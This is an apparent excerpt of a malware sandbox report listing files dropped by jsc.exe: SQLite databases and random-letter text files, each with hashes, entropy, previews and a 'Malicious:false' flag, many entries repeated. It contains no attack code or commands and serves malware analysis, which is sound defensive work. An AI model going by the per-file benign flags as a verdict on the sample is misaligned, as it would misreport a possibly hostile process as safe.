                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.137181696973627
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                      MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                      SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                      SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                      SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.137181696973627
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                      MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                      SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                      SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                      SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):98304
                                                                                      Entropy (8bit):0.08235737944063153
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696724055101702
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:amL3nXTtZkQxqip7hViX2Zka12//5V9PP+Iw5ZrfqoV2P8S7FpwmKxlTn:xXL4ivV62qaI/xVhVWZ+X8SxKDT
                                                                                      MD5:1FFF6A639C738561CDC01BD436BA77C1
                                                                                      SHA1:BAFB1D68D43B177330F701BA01CA1AD19CB4FBB8
                                                                                      SHA-256:C2279E62766B7EFD46442641AECB3D9A0A25CE999296AC5BA9DA7BF18B2BDA92
                                                                                      SHA-512:65EFD5B1E235EF6AD917EAF95E16E3287CA9720F3F0EE989667A1DBB651693580415182F64FFA7538986E2BE7F19AC030836DF62489BB49C42383F5FCD3FA5D2
                                                                                      Malicious:false
                                                                                      Preview:NWCXBPIUYIVIMEKOECOAETPCBVGOLLFSFYSIEWGCQXXYDTHBXCBBHRPJYJIIAKLIVVLYHTWFXTIMRQKNXJVKYWJRGDPRAMVTWAMYMVUPBCODOHNWGVUTTMDRCGQSWUENMIVFDVUFWRBWWAXFGLJCWHJESVSORVMBBPZHMGNOLAZEBTVVZJSGFZDCEBOKEELVIKVUJUJMYXSQXAWBVPYELDJUPEKNZGLXBNUDAABLCYAZVPQYBYHWASQZIKCOZDJXTSUXLKTDHJGSYIZZEGRZZNKKDUJMXSRWEDSBIZWRCWGJILNJNQKYISXAGNMQIWLOTRVEMVUEFFBMOVSUOJIHGLPPIKHURRWPPLYGZVGPLTDDNFHWCGDYBJWXDCKVHBTKZNVCGFMGAYMEPNBBZNTBERBXWUZQOWOXLEBSIXOWEZFEHNZYOEPBPYERLPMITANPJUDWNRNURGGOVPAFPUMUFAJJGHCGGSHCPAKCRSPZJJODRADCRCMYZDUAIWBDBDCPBUYVIRSRMZFDRIJQLLRUECYTILJEKDTTKMJATFJZGEOYRXTQSNGOENKASOPKMGWIWBAOMVIDHMXGNZFQLDKEJHBNZOCNFNIXNHOKWJNDTYAWGDGLYPWBQMSVSXTAECOYAEULSBSJPKKFQWDJACOZKJGANAIJBUMCLKLMRCAXPGXPFJMMBITWGGANYVNUIAJQWHHSWFPPASKHZAUXVZCDBKOWYHZAGAZKRYAWMXNYMSOVNKLUSFMEKYZMJTXYMLLTDLXXHKEEHBYXXFBEBTALQHMYPVOGJLATHUICOJIIQJINSCWPMNRVRLYYRHLAJBLVHEDYTFSDAVKINLNNEEURYKXHNXJMZIQWVOJNOTKRUWHSVTMXWRNJWLJJHPIPSFMIAIWBMNDXXCXXZCPDOKGRINVUVYHCJLFDJIZCOEFTHTRHTIWRPLTKLXPUDEBCIHBMDJOHZRRRYIUNRRIECVWDGMFRWLRMKDBNVTLGPDQC
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6957997909429325
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:kKnyV7BxweFQl79j+hRxUY//oWt/yeHEMcXJn25feaqrZZqW+LRJvy:kKnY7wGQlSxH/9kM0Jn25grZgRJa
                                                                                      MD5:4F49714E789620AEDB7B9565DC949466
                                                                                      SHA1:5917AC09E3D5074BFF8E1289865CAFF6403D1E82
                                                                                      SHA-256:A9D5D3D8BE1D9E0187DA4AF85AFF3E2D1D6DE977D13EDA76900C96D98A8F073B
                                                                                      SHA-512:61F147FA2B300AC2E3A42445F1283A47C805B756F36730CDCD4DB5A711BE43EFA471C7ECFB865908791852D1AAF365284BD4DE01F0EA0BF9DCD416A853C804E9
                                                                                      Malicious:false
                                                                                      Preview:NYMMPCEIMABCZIWJTJBTGSCCAGUWVTYLYWSVBSDZXQVJYUDCVLRURABBOBVCVDMKRKSRCSPXNAWPZJIOBULMRNUUOMOQGMWJLMZDBRBKAATADQPXHJFNCLPVAYDJHNDQMYWKBXYCBZJQANHQXCJPZQWORFXISYXSVTGTQJXNOUHRMKMJWJYCVNYAJFLKQVPGEYIUPPSZIHLNRGNCVNQBEZHDSJLAAKTOQOPFKISQUVSYIJUTXMPMVSFBVQNNFUXQRBBZWPVQFKOIAVQQMWQKLBSRPGKOQWZJAMBIDYJLYFILNAEEJCLRGBXDTSTBTNJDUXNFJBEZUDHSQUEENVIJUBNKGOLASBWAZBYYZZCOGWIJLRICWMFOAHSZVHCPRGDQXQUHZNZAIBOSXNAEYXAGWDBIHQGHOMKGZVYJDFBRWFKGJWGGPPTKNYWOHJZEIWRXWBERKQREQFMJHAKYHJCBTJJONCVMKTRJZVEWZOAKRUZLPQOXEQLKYATRQESEWRXETALDGKSHWFGQVXVYWPZEUDKTVGFGTXHQNKYUTVLNVAJFDYFPLRACHLYNSSVZZIAKKEEENZFLNPGNCVKMHGOYMQEBOXNMEXNXHUPMZAMZZQVDPFGLUSJHKGQWGKDPXMSIYPGNIXUXSJQFAXJLLSOUEANCWYAHDTOQTEKVGNOWSZINVNYZYIYNTVHHTDVGBTBPYPINRBPJYKHMRFCGSMCNFESVFMQIFPOJDAJGZEYTMLYQIIYRBVNEZSIWWOKGVIVGLXAQUNYDTWHGEWOLDMZRPSOAJKFXVJJTTIAJVLZGIFIWTHVZZGQOVGNSYXTJVFSXNDQLHICPBSAZIKIPLGSRTCKFEGRKNLTONCJFACYIGQPYUHVPNPUUGOOGHBAMCKOGYKVNNBSVPYVHZVJCMTDSHLBWEDMSWSFZAIRFDEYBDVHTWHABAXCAQCTXQRIUHVQFAEPMNYIWIBWVEEZTZGQTPDYRFAGKUGAEBSQFYYQG
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.697427014915338
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:J87vGcgdreYqco0NFLg5eIatTFj9qVUq2Z:J83gAYq8NFRtx7Z
                                                                                      MD5:2D7ACA56B5F340F28DD1D2B46D700BA6
                                                                                      SHA1:3966684FF029665614B8DC948349178FB9E8C078
                                                                                      SHA-256:B227E5E45D28AC063349BC70CC01A3F6DB15C101432A8609E0202064F7E5936D
                                                                                      SHA-512:D4BFC2BB839DAEBAE8C894A0B8EB2314D2BE0304C82EB89BE16D6C820874952534CE0D93AE62EEF3DD2BE8A4D1E828B883E50BD204D04624AB945119D2FAB4F0
                                                                                      Malicious:false
                                                                                      Preview:ZIPXYXWIOYFFJDUIEBFLHIUBYNNMJGYPFQONGOLQHGMFRFYQGSVGNDSCQJYWDCIKWJWNYHFUEMJVEPAFIPAROVFAVARCOHESRJKUIUYDXNZOERBEQGHQNKYMVMEEMKKKEYXXPAKWYGCIXNFSVDOOEUTNGSDXMYEZKQTRDCZXZXIFSRMNAEPZWJKKYULUPGZCQORNOJBGAAOPLYNJCPFWSASJWTLALTQZLWOGFWQVOXGYBCMNEBDESHLNZZBETDIGNLTNPZEPEQAMYCNYWEKKQKDVZPNYLWAFZIPSSVNHOPUMIBTFXVVCNCPUSOKETVBDNZLCRKBRLGSHFSQLECHUOWGFFEMDWHASNSMAXKZZMDLZVQLADFBDUCCIJERQXKRXUCTKGDGKPESHHXUPKZSGNKOITMVITFCBELJVTCKENQCMCJEDZJDQDSKAYFGQEYICXDUOIJRYIMVXRKNBYXQEHUHYSPGEDSJBOQNXHFTSSRTPOXDVFXEPQUGWNEAKZJOKYPEYKXMOMKTKOBVISHMUGELPJCXBYNEXOAWOXHSEELVSCFMZYAMOLTGIWURMTZTRNGMWQZBRQHAIXVJIAFPZGWJZIOQLOAXJSGKMZNZCAVJWFGUFMQWQICMPVNAYRUHAMQLWLJMBERSFPEZHMNVAZFQAJEGYJQOMQWFTQVXZYTDPYVGZZPSNSOJWWKZDRPZKGTXYSENWOIQFXDIRWPJEYALOOEYQPHOPKSIZFNHPOXOKSTDVPNBSCDDKPOUVXMFBUNBMEUYGOSYMHMUNKKADTAEIUEMXYPOPMUVBHTBVKYAHHJXFUJPFZJZARAFLARBIWKXMNKXJLVBLJSZYYVIBZHROONQENYZGGMMETTMOFHCCQNUHPDEUTVVGUDBCKVXVUMRWPGZIPPUXJEJQIEQWLBUQBUODMWPSBFOYIQZWMYWPHWSKTRCKCRXWZUOTDTDRLLUSSQZXZZEATFSHBUWQUYHDLRMVVWFCPAZNSBXA
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696724055101702
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:amL3nXTtZkQxqip7hViX2Zka12//5V9PP+Iw5ZrfqoV2P8S7FpwmKxlTn:xXL4ivV62qaI/xVhVWZ+X8SxKDT
                                                                                      MD5:1FFF6A639C738561CDC01BD436BA77C1
                                                                                      SHA1:BAFB1D68D43B177330F701BA01CA1AD19CB4FBB8
                                                                                      SHA-256:C2279E62766B7EFD46442641AECB3D9A0A25CE999296AC5BA9DA7BF18B2BDA92
                                                                                      SHA-512:65EFD5B1E235EF6AD917EAF95E16E3287CA9720F3F0EE989667A1DBB651693580415182F64FFA7538986E2BE7F19AC030836DF62489BB49C42383F5FCD3FA5D2
                                                                                      Malicious:false
                                                                                      Preview:NWCXBPIUYIVIMEKOECOAETPCBVGOLLFSFYSIEWGCQXXYDTHBXCBBHRPJYJIIAKLIVVLYHTWFXTIMRQKNXJVKYWJRGDPRAMVTWAMYMVUPBCODOHNWGVUTTMDRCGQSWUENMIVFDVUFWRBWWAXFGLJCWHJESVSORVMBBPZHMGNOLAZEBTVVZJSGFZDCEBOKEELVIKVUJUJMYXSQXAWBVPYELDJUPEKNZGLXBNUDAABLCYAZVPQYBYHWASQZIKCOZDJXTSUXLKTDHJGSYIZZEGRZZNKKDUJMXSRWEDSBIZWRCWGJILNJNQKYISXAGNMQIWLOTRVEMVUEFFBMOVSUOJIHGLPPIKHURRWPPLYGZVGPLTDDNFHWCGDYBJWXDCKVHBTKZNVCGFMGAYMEPNBBZNTBERBXWUZQOWOXLEBSIXOWEZFEHNZYOEPBPYERLPMITANPJUDWNRNURGGOVPAFPUMUFAJJGHCGGSHCPAKCRSPZJJODRADCRCMYZDUAIWBDBDCPBUYVIRSRMZFDRIJQLLRUECYTILJEKDTTKMJATFJZGEOYRXTQSNGOENKASOPKMGWIWBAOMVIDHMXGNZFQLDKEJHBNZOCNFNIXNHOKWJNDTYAWGDGLYPWBQMSVSXTAECOYAEULSBSJPKKFQWDJACOZKJGANAIJBUMCLKLMRCAXPGXPFJMMBITWGGANYVNUIAJQWHHSWFPPASKHZAUXVZCDBKOWYHZAGAZKRYAWMXNYMSOVNKLUSFMEKYZMJTXYMLLTDLXXHKEEHBYXXFBEBTALQHMYPVOGJLATHUICOJIIQJINSCWPMNRVRLYYRHLAJBLVHEDYTFSDAVKINLNNEEURYKXHNXJMZIQWVOJNOTKRUWHSVTMXWRNJWLJJHPIPSFMIAIWBMNDXXCXXZCPDOKGRINVUVYHCJLFDJIZCOEFTHTRHTIWRPLTKLXPUDEBCIHBMDJOHZRRRYIUNRRIECVWDGMFRWLRMKDBNVTLGPDQC
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6957997909429325
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:kKnyV7BxweFQl79j+hRxUY//oWt/yeHEMcXJn25feaqrZZqW+LRJvy:kKnY7wGQlSxH/9kM0Jn25grZgRJa
                                                                                      MD5:4F49714E789620AEDB7B9565DC949466
                                                                                      SHA1:5917AC09E3D5074BFF8E1289865CAFF6403D1E82
                                                                                      SHA-256:A9D5D3D8BE1D9E0187DA4AF85AFF3E2D1D6DE977D13EDA76900C96D98A8F073B
                                                                                      SHA-512:61F147FA2B300AC2E3A42445F1283A47C805B756F36730CDCD4DB5A711BE43EFA471C7ECFB865908791852D1AAF365284BD4DE01F0EA0BF9DCD416A853C804E9
                                                                                      Malicious:false
                                                                                      Preview:NYMMPCEIMABCZIWJTJBTGSCCAGUWVTYLYWSVBSDZXQVJYUDCVLRURABBOBVCVDMKRKSRCSPXNAWPZJIOBULMRNUUOMOQGMWJLMZDBRBKAATADQPXHJFNCLPVAYDJHNDQMYWKBXYCBZJQANHQXCJPZQWORFXISYXSVTGTQJXNOUHRMKMJWJYCVNYAJFLKQVPGEYIUPPSZIHLNRGNCVNQBEZHDSJLAAKTOQOPFKISQUVSYIJUTXMPMVSFBVQNNFUXQRBBZWPVQFKOIAVQQMWQKLBSRPGKOQWZJAMBIDYJLYFILNAEEJCLRGBXDTSTBTNJDUXNFJBEZUDHSQUEENVIJUBNKGOLASBWAZBYYZZCOGWIJLRICWMFOAHSZVHCPRGDQXQUHZNZAIBOSXNAEYXAGWDBIHQGHOMKGZVYJDFBRWFKGJWGGPPTKNYWOHJZEIWRXWBERKQREQFMJHAKYHJCBTJJONCVMKTRJZVEWZOAKRUZLPQOXEQLKYATRQESEWRXETALDGKSHWFGQVXVYWPZEUDKTVGFGTXHQNKYUTVLNVAJFDYFPLRACHLYNSSVZZIAKKEEENZFLNPGNCVKMHGOYMQEBOXNMEXNXHUPMZAMZZQVDPFGLUSJHKGQWGKDPXMSIYPGNIXUXSJQFAXJLLSOUEANCWYAHDTOQTEKVGNOWSZINVNYZYIYNTVHHTDVGBTBPYPINRBPJYKHMRFCGSMCNFESVFMQIFPOJDAJGZEYTMLYQIIYRBVNEZSIWWOKGVIVGLXAQUNYDTWHGEWOLDMZRPSOAJKFXVJJTTIAJVLZGIFIWTHVZZGQOVGNSYXTJVFSXNDQLHICPBSAZIKIPLGSRTCKFEGRKNLTONCJFACYIGQPYUHVPNPUUGOOGHBAMCKOGYKVNNBSVPYVHZVJCMTDSHLBWEDMSWSFZAIRFDEYBDVHTWHABAXCAQCTXQRIUHVQFAEPMNYIWIBWVEEZTZGQTPDYRFAGKUGAEBSQFYYQG
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.697427014915338
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:J87vGcgdreYqco0NFLg5eIatTFj9qVUq2Z:J83gAYq8NFRtx7Z
                                                                                      MD5:2D7ACA56B5F340F28DD1D2B46D700BA6
                                                                                      SHA1:3966684FF029665614B8DC948349178FB9E8C078
                                                                                      SHA-256:B227E5E45D28AC063349BC70CC01A3F6DB15C101432A8609E0202064F7E5936D
                                                                                      SHA-512:D4BFC2BB839DAEBAE8C894A0B8EB2314D2BE0304C82EB89BE16D6C820874952534CE0D93AE62EEF3DD2BE8A4D1E828B883E50BD204D04624AB945119D2FAB4F0
                                                                                      Malicious:false
                                                                                      Preview:ZIPXYXWIOYFFJDUIEBFLHIUBYNNMJGYPFQONGOLQHGMFRFYQGSVGNDSCQJYWDCIKWJWNYHFUEMJVEPAFIPAROVFAVARCOHESRJKUIUYDXNZOERBEQGHQNKYMVMEEMKKKEYXXPAKWYGCIXNFSVDOOEUTNGSDXMYEZKQTRDCZXZXIFSRMNAEPZWJKKYULUPGZCQORNOJBGAAOPLYNJCPFWSASJWTLALTQZLWOGFWQVOXGYBCMNEBDESHLNZZBETDIGNLTNPZEPEQAMYCNYWEKKQKDVZPNYLWAFZIPSSVNHOPUMIBTFXVVCNCPUSOKETVBDNZLCRKBRLGSHFSQLECHUOWGFFEMDWHASNSMAXKZZMDLZVQLADFBDUCCIJERQXKRXUCTKGDGKPESHHXUPKZSGNKOITMVITFCBELJVTCKENQCMCJEDZJDQDSKAYFGQEYICXDUOIJRYIMVXRKNBYXQEHUHYSPGEDSJBOQNXHFTSSRTPOXDVFXEPQUGWNEAKZJOKYPEYKXMOMKTKOBVISHMUGELPJCXBYNEXOAWOXHSEELVSCFMZYAMOLTGIWURMTZTRNGMWQZBRQHAIXVJIAFPZGWJZIOQLOAXJSGKMZNZCAVJWFGUFMQWQICMPVNAYRUHAMQLWLJMBERSFPEZHMNVAZFQAJEGYJQOMQWFTQVXZYTDPYVGZZPSNSOJWWKZDRPZKGTXYSENWOIQFXDIRWPJEYALOOEYQPHOPKSIZFNHPOXOKSTDVPNBSCDDKPOUVXMFBUNBMEUYGOSYMHMUNKKADTAEIUEMXYPOPMUVBHTBVKYAHHJXFUJPFZJZARAFLARBIWKXMNKXJLVBLJSZYYVIBZHROONQENYZGGMMETTMOFHCCQNUHPDEUTVVGUDBCKVXVUMRWPGZIPPUXJEJQIEQWLBUQBUODMWPSBFOYIQZWMYWPHWSKTRCKCRXWZUOTDTDRLLUSSQZXZZEATFSHBUWQUYHDLRMVVWFCPAZNSBXA
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.137181696973627
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                      MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                      SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                      SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                      SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.137181696973627
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                      MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                      SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                      SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                      SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.137181696973627
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                      MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                      SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                      SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                      SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.137181696973627
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                      MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                      SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                      SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                      SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.137181696973627
                                                                                      Encrypted:false
